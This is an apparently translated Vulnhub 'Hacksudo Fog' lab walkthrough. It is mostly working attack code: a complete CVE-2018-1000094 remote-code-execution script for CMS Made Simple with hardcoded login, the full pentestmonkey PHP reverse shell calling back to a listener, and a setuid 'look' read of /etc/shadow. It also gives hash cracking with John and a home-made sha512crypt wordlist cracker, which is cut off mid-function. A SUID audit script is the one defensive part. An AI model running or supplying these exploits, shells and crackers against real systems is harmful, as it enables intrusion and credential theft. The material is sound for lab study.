{'_sk_': '9929b45a18f71fa7e13', 'CMSSESSIDb272ee47bbbb': 'gjchtrm81f5l9ea66896su247q', '45ba4203b38f2ebed8db32a30c699e4e': '746ff3c7cd79fffb98549c3d3b674e35993020d4%3A%3AYTo1OntzOjM6InVpZCI7aToyO3M6ODoidXNlcm5hbWUiO3M6MzoiZm9nIjtzOjc6ImVmZl91aWQiO047czoxMjoiZWZmX3VzZXJuYW1lIjtOO3M6NToiY2tzdW0iO3M6NDA6IjI0ZTNlMmEzODg4MDU1NGFjMjg4NGIyYjRmOWNjMzc0ODI0OWVjZTAiO30%3D'}
csrf=
9929b45a18f71fa7e13
[*] Attempting to upload cmsmsrce.txt...
[+] Successfully uploaded cmsmsrce.txt
[*] Attempting to copy cmsmsrce.txt to shell.php...
check response
[+] File copied successfully
[+] Exploit succeeded, shell can be found at: http://192.168.56.157/cms/uploads/shell.php
The upload succeeds; now verify that the shell works:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ curl http://192.168.56.157/cms/uploads/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Although arbitrary commands can be executed, a reverse shell could not be spawned through nc, python and the like.
Change of approach:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ cat shell.php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.146'; // CHANGE THIS
$port = 5555; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
Copy shell.php (the pentestmonkey reverse shell) into the exploit script exploit_rev.py, replacing the original one-line web-shell payload system($_GET['cmd']). In the script below that one-liner is still assigned to payload and then immediately overwritten by the reverse-shell string, so only the reverse shell is uploaded; $ip and $port inside it must point at the Kali listener (192.168.56.146:5555 here).
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ cat exploit_rev.py
# Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution
# Date: 3rd of July, 2018
# Exploit Author: Mustafa Hasan (@strukt93)
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: http://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.5
# CVE: CVE-2018-1000094
import requests
import base64
base_url = "http://192.168.56.157/cms/admin"
upload_dir = "/uploads"
upload_url = base_url.split('/admin')[0] + upload_dir
username = "fog"
password = "hacksudoISRO"
csrf_param = "_sk_"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell_rev.php'
payload = "<?php system($_GET['cmd']);?>"
payload = """
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.146'; // CHANGE THIS
$port = 5555; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is sent down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>"""
def parse_csrf_token(location):
print location
return location.split(csrf_param+"=")[1]
def authenticate():
page = "/login.php"
url = base_url + page
data = {
"username": username,
"password": password,
"loginsubmit": "Submit"
}
response = requests.post(url, data=data, allow_redirects=False)
status_code = response.status_code
if status_code == 302:
print "[+] Authenticated successfully with the supplied credentials"
#print response.cookies
print '*'*20
cookies = requests.utils.dict_from_cookiejar(response.cookies)
print cookies
print response.headers['Location']
return cookies, parse_csrf_token(response.headers['Location'])
print "[-] Authentication failed"
return None, None
def upload_txt(cookies, csrf_token):
mact = "FileManager,m1_,upload,0"
page = "/moduleinterface.php"
url = base_url + page
data = {
"mact": mact,
csrf_param: csrf_token,
"disable_buffer": 1
}
txt = {
'm1_files[]': (txt_filename, payload)
}
print "[*] Attempting to upload {}...".format(txt_filename)
response = requests.post(url, data=data, files=txt, cookies=cookies)
#print response.text
status_code = response.status_code
if status_code == 200:
print "[+] Successfully uploaded {}".format(txt_filename)
return True
print "[-] An error occurred while uploading {}".format(txt_filename)
return None
def copy_to_php(cookies, csrf_token):
mact = "FileManager,m1_,fileaction,0"
page = "/moduleinterface.php"
url = base_url + page
b64 = base64.b64encode(txt_filename)
serialized = 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)
data = {
"mact": mact,
csrf_param: csrf_token,
"m1_fileactioncopy": "",
"m1_path": upload_dir,
"m1_selall": serialized,
"m1_destdir": "/",
"m1_destname": php_filename,
"m1_submit": "Copy"
}
print "[*] Attempting to copy {} to {}...".format(txt_filename, php_filename)
response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
print 'check response'
status_code = response.status_code
print response.text
if status_code == 302:
if response.headers['Location'].endswith('copysuccess'):
print "[+] File copied successfully"
return True
print "[-] An error occurred while copying, maybe {} already exists".format(php_filename)
return None
def quit():
print "[-] Exploit failed"
exit()
def run():
cookies,csrf_token = authenticate()
print 'cookies='
print cookies
print 'csrf='
print csrf_token
if not cookies:
quit()
if not upload_txt(cookies, csrf_token):
quit()
if not copy_to_php(cookies, csrf_token):
quit()
print "[+] Exploit succeeded, shell can be found at: {}".format(upload_url + '/' + php_filename)
run()
Then run exploit_rev.py (it is Python 2 code, hence python2):
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ python2 exploit_rev.py
[+] Authenticated successfully with the supplied credentials
********************
{'_sk_': '797a9b8f5f3ce869334', 'CMSSESSIDb272ee47bbbb': 'k1oqtn9kov5oi3fpphknc6hvsv', '45ba4203b38f2ebed8db32a30c699e4e': '746ff3c7cd79fffb98549c3d3b674e35993020d4%3A%3AYTo1OntzOjM6InVpZCI7aToyO3M6ODoidXNlcm5hbWUiO3M6MzoiZm9nIjtzOjc6ImVmZl91aWQiO047czoxMjoiZWZmX3VzZXJuYW1lIjtOO3M6NToiY2tzdW0iO3M6NDA6IjI0ZTNlMmEzODg4MDU1NGFjMjg4NGIyYjRmOWNjMzc0ODI0OWVjZTAiO30%3D'}
http://192.168.56.157/cms/admin?_sk_=797a9b8f5f3ce869334
http://192.168.56.157/cms/admin?_sk_=797a9b8f5f3ce869334
cookies=
{'_sk_': '797a9b8f5f3ce869334', 'CMSSESSIDb272ee47bbbb': 'k1oqtn9kov5oi3fpphknc6hvsv', '45ba4203b38f2ebed8db32a30c699e4e': '746ff3c7cd79fffb98549c3d3b674e35993020d4%3A%3AYTo1OntzOjM6InVpZCI7aToyO3M6ODoidXNlcm5hbWUiO3M6MzoiZm9nIjtzOjc6ImVmZl91aWQiO047czoxMjoiZWZmX3VzZXJuYW1lIjtOO3M6NToiY2tzdW0iO3M6NDA6IjI0ZTNlMmEzODg4MDU1NGFjMjg4NGIyYjRmOWNjMzc0ODI0OWVjZTAiO30%3D'}
csrf=
797a9b8f5f3ce869334
[*] Attempting to upload cmsmsrce.txt...
[+] Successfully uploaded cmsmsrce.txt
[*] Attempting to copy cmsmsrce.txt to shell_rev.php...
check response
[+] File copied successfully
[+] Exploit succeeded, shell can be found at: http://192.168.56.157/cms/uploads/shell_rev.php
Start a listener on port 5555 first, then open shell_rev.php in the browser. The PHP process connects back and hands over a shell as www-data; the HTTP request itself stays pending for as long as the shell is alive. The shell is then upgraded to a pty with python:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.157] 55688
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
03:27:03 up 6:44, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacksudo:/$ ls
ls
bin ftphome lib lost+found proc srv usr
boot home lib32 media root sys var
dev initrd.img lib64 mnt run tftpboot.prev vmlinuz
etc initrd.img.old libx32 opt sbin tmp vmlinuz.old
www-data@hacksudo:/$
Privilege escalation
Upload linpeas.sh to /tmp on the target, make it executable and run it. Its output points at the second flag, flag2.txt in www-data's home directory:
www-data@hacksudo:~$ cat flag2.txt
cat flag2.txt
you successfully crack web and got shell access!!!
_ _ _ _
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
step 2 done.
_ ____
___| |_ ___ _ __ |___ \
/ __| __/ _ \ '_ \ __) |
\__ \ || __/ |_) | / __/
|___/\__\___| .__/ |_____|
|_|
www-data@hacksudo:~$
The linpeas output also reports that look has the SUID bit set. look is not setuid on a stock Debian install; it prints every line of a file that begins with the given string, and with an empty string every line matches, so a setuid-root look reads any root-owned file, /etc/shadow included:
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 113K Jun 24 2020 /usr/sbin/mount.nfs
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 154K Jan 20 2021 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 11K May 4 2018 /usr/bin/look
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
www-data@hacksudo:~$ LFILE=/etc/shadow
LFILE=/etc/shadow
www-data@hacksudo:~$ /usr/bin/look '' "$LFILE"
/usr/bin/look '' "$LFILE"
root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
daemon:*:18751:0:99999:7:::
bin:*:18751:0:99999:7:::
sys:*:18751:0:99999:7:::
sync:*:18751:0:99999:7:::
games:*:18751:0:99999:7:::
man:*:18751:0:99999:7:::
lp:*:18751:0:99999:7:::
mail:*:18751:0:99999:7:::
news:*:18751:0:99999:7:::
uucp:*:18751:0:99999:7:::
proxy:*:18751:0:99999:7:::
www-data:*:18751:0:99999:7:::
backup:*:18751:0:99999:7:::
list:*:18751:0:99999:7:::
irc:*:18751:0:99999:7:::
gnats:*:18751:0:99999:7:::
nobody:*:18751:0:99999:7:::
_apt:*:18751:0:99999:7:::
systemd-timesync:*:18751:0:99999:7:::
systemd-network:*:18751:0:99999:7:::
systemd-resolve:*:18751:0:99999:7:::
systemd-coredump:!!:18751::::::
messagebus:*:18751:0:99999:7:::
sshd:*:18751:0:99999:7:::
mysql:!:18751:0:99999:7:::
_rpc:*:18751:0:99999:7:::
statd:*:18751:0:99999:7:::
tftp:*:18751:0:99999:7:::
ftpuser:!:18751:0:99999:7:::
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
dnsmasq:*:18756:0:99999:7:::
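The SUID review above is the kind of check worth automating, both as an attacker triaging a foothold and as a defender baselining a host. The following is an added example, not code from the original write-up: it parses ls -l style lines such as those linpeas printed, decodes the mode string into numeric permission bits, and flags setuid files that are either known GTFOBins-style primitives or absent from an expected baseline. The listing is a constructed sample taken from the output above, and both the baseline set and the primitive map are assumptions constructed for the example (a real allow-list would be generated from a clean image of the same release).

```python
from typing import List, NamedTuple

# Constructed sample: SUID lines linpeas printed above, plus one non-SUID line
# from isro's fog directory to show it is ignored.
LS_SAMPLE = """\
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 113K Jun 24 2020 /usr/sbin/mount.nfs
-rwsr-xr-x 1 root root 154K Jan 20 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 11K May 4 2018 /usr/bin/look
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd
-rwxr-xr-x 1 isro isro 68K May 6 2021 /home/isro/fog/ping
"""

# Assumption for this example: setuid files a stock Debian 10 install is expected to carry.
EXPECTED_SUID = {
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/sbin/mount.nfs",
    "/usr/bin/gpasswd", "/usr/bin/umount", "/usr/bin/sudo", "/usr/bin/chfn",
    "/usr/bin/mount", "/usr/bin/chsh", "/usr/bin/newgrp", "/usr/bin/su",
    "/usr/bin/passwd",
}
# Assumption: a small GTFOBins-style map of what a setuid-root copy hands an attacker.
KNOWN_PRIMITIVES = {
    "look": "reads any file: look '' /etc/shadow",
    "find": "spawns a shell: find . -exec /bin/sh -p \\; -quit",
    "vim": "spawns a shell from :!sh",
    "python": "os.setuid(0) followed by os.system('/bin/sh')",
}


class Finding(NamedTuple):
    path: str
    owner: str
    mode: int
    reason: str


def mode_to_int(mode: str) -> int:
    """'-rwsr-xr-x' -> 0o4755; handles s/S (setuid, setgid) and t/T (sticky)."""
    if len(mode) != 10:
        raise ValueError(f"bad mode string: {mode!r}")
    bits = 0
    for i, ch in enumerate(mode[1:]):        # i = 0..8 over rwxrwxrwx
        if ch in "rwx":
            bits |= 1 << (8 - i)
        elif ch in "sS" and i in (2, 5):     # owner/group execute slot
            bits |= 0o4000 if i == 2 else 0o2000
            if ch == "s":                    # lower-case: execute bit also set
                bits |= 1 << (8 - i)
        elif ch in "tT" and i == 8:          # other execute slot
            bits |= 0o1000
            if ch == "t":
                bits |= 1
        elif ch != "-":
            raise ValueError(f"bad mode character {ch!r} in {mode!r}")
    return bits


def audit_suid(listing: str) -> List[Finding]:
    """Flag setuid entries that are known primitives, off-baseline, or world-writable."""
    findings = []
    for line in listing.splitlines():
        fields = line.split(None, 8)         # mode links owner group size mon day year path
        if len(fields) < 9:
            continue
        mode, owner, path = mode_to_int(fields[0]), fields[2], fields[8].strip()
        if not mode & 0o4000:                # no setuid bit: nothing to review
            continue
        name = path.rsplit("/", 1)[-1]
        if name in KNOWN_PRIMITIVES:
            findings.append(Finding(path, owner, mode, "known abuse primitive: " + KNOWN_PRIMITIVES[name]))
        elif path not in EXPECTED_SUID:
            findings.append(Finding(path, owner, mode, "setuid file not in the expected baseline"))
        if mode & 0o002:
            findings.append(Finding(path, owner, mode, "world-writable setuid file"))
    return findings


if __name__ == "__main__":
    for f in audit_suid(LS_SAMPLE):
        print(f"{oct(f.mode)} {f.owner:<6} {f.path}: {f.reason}")
```

On the listing above only /usr/bin/look is reported; everything else is either stock Debian or, like ping, not setuid at all. Feed the output of find / -perm -4000 -exec ls -l {} + into the same function to run it against a live host.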
With /etc/shadow read through the SUID look, write the two interesting lines to a local shadow file and a matching passwd file by hand (only the root and isro entries, as encr.txt shows), then merge them with unshadow:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ vim shadow
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ vim passwd
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ unshadow passwd shadow > encr.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ cat encr.txt
root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:0:0:root:/root:/bin/bash
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:1003:1003:,,,:/home/isro:/bin/bash
Then crack the merged file with John the Ripper:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Hacksudo_Fog]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt encr.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty (isro)
isro's password is cracked almost immediately: qwerty.
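unshadow and john above do two things: join each passwd line with its shadow hash, then test wordlist candidates against the sha512crypt ($6$) hash. This added example, which is not code from the original write-up, does both in plain Python with hashlib only: it re-implements the SHA-crypt $6$ scheme (the same algorithm crypt(3) runs on Debian), skips accounts whose password field is *, ! or !! since they hold no hash, and runs a short constructed wordlist over the two hashes read from the target. The shadow and passwd lines and the wordlist are constructed samples; the two hashes are the ones printed above.

```python
import hashlib
import hmac
from typing import Dict, Iterable, List, Optional

# Constructed sample: the two real hashes returned by `look '' /etc/shadow` above
# plus a few locked entries ('*', '!', '!!' carry no password to crack).
SHADOW_SAMPLE = """\
root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
daemon:*:18751:0:99999:7:::
www-data:*:18751:0:99999:7:::
mysql:!:18751:0:99999:7:::
systemd-coredump:!!:18751::::::
isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
"""
# Constructed passwd lines matching the hand-written file used with unshadow above.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
isro:x:1003:1003:,,,:/home/isro:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""
WORDLIST = ["123456", "password", "hacksudo", "qwerty"]  # constructed stand-in for rockyou.txt

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# Digest byte order of the reference implementation's b64_from_24bit() calls.
_ORDER = [(0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
          (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
          (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
          (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
          (62, 20, 41)]


def _repeat_to(digest: bytes, n: int) -> bytes:
    """Byte sequences P and S of the spec: a 64-byte digest repeated/truncated to n bytes."""
    return digest * (n // 64) + digest[: n % 64]


def sha512_crypt_digest(password: bytes, salt: bytes, rounds: int = 5000) -> str:
    """86-character encoded part of a $6$ hash (SHA-crypt as in glibc)."""
    salt = salt[:16]
    b = hashlib.sha512(password + salt + password).digest()            # digest B
    a = hashlib.sha512(password + salt + _repeat_to(b, len(password)))  # digest A
    n = len(password)
    while n:                       # bits of len(password), least significant first
        a.update(b if n & 1 else password)
        n >>= 1
    c = a.digest()
    p = _repeat_to(hashlib.sha512(password * len(password)).digest(), len(password))
    s = _repeat_to(hashlib.sha512(salt * (16 + c[0])).digest(), len(salt))
    for r in range(rounds):        # the cost: 5000 chained SHA-512 computations by default
        h = hashlib.sha512(p if r & 1 else c)
        if r % 3:
            h.update(s)
        if r % 7:
            h.update(p)
        h.update(c if r & 1 else p)
        c = h.digest()
    out = bytearray()
    for i, j, k in _ORDER:         # 21 groups of 3 bytes -> 4 chars each, then the last byte -> 2
        w = (c[i] << 16) | (c[j] << 8) | c[k]
        for _ in range(4):
            out.append(ITOA64[w & 0x3F])
            w >>= 6
    w = c[63]
    for _ in range(2):
        out.append(ITOA64[w & 0x3F])
        w >>= 6
    return out.decode()


def verify(candidate: str, shadow_hash: str) -> bool:
    """Recompute with the stored salt and rounds, compare in constant time."""
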